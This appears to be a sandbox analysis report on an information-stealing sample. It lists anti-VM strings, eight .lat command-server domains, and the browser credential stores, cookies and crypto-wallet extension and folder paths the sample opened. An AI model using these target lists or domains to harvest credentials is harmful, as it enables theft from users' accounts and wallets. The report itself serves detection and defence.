        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000AC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi+
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeAPI call chain: ExitProcess graph end nodegraph_3-25557
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043C1F0 LdrInitializeThunk,3_2_0043C1F0
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009700C6 mov eax, dword ptr fs:[00000030h]0_2_009700C6
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0094092B mov eax, dword ptr fs:[00000030h]0_2_0094092B
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00940D90 mov eax, dword ptr fs:[00000030h]0_2_00940D90
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00C00F93 push dword ptr fs:[00000030h]0_2_00C00F93
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0097092B mov eax, dword ptr fs:[00000030h]3_2_0097092B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00970D90 mov eax, dword ptr fs:[00000030h]3_2_00970D90
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A5100B push dword ptr fs:[00000030h]3_2_00A5100B
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0096A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0096A63A
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0095073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0095073A
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009508CD SetUnhandledExceptionFilter,0_2_009508CD
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0094FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0094FB78

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C7B4.tmp.exeString found in binary or memory: rapeflowwj.lat
        Source: C7B4.tmp.exeString found in binary or memory: crosshuaht.lat
        Source: C7B4.tmp.exeString found in binary or memory: sustainskelet.lat
        Source: C7B4.tmp.exeString found in binary or memory: aspecteirs.lat
        Source: C7B4.tmp.exeString found in binary or memory: energyaffai.lat
        Source: C7B4.tmp.exeString found in binary or memory: necklacebudi.lat
        Source: C7B4.tmp.exeString found in binary or memory: discokeyus.lat
        Source: C7B4.tmp.exeString found in binary or memory: grannyejh.lat
        Source: C:\Users\user\Desktop\InstallSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_004351C0
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0043B282
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0043B368
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_0043B645
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_0043B875
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_00434DCD
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_00975034
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0097B271
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0097B4E9
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_00975427
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0097B5CF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: EnumSystemLocalesW,0_2_0097B534
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_0097B8A3
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_0097B8AC
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0097B9D5
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetLocaleInfoW,0_2_0097BADC
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0097BBA9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
        Source: C7B4.tmp.exe, 00000003.00000002.1819320352.00000000030E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
        Source: C7B4.tmp.exe, 00000003.00000002.1819320352.00000000030E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsAu
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
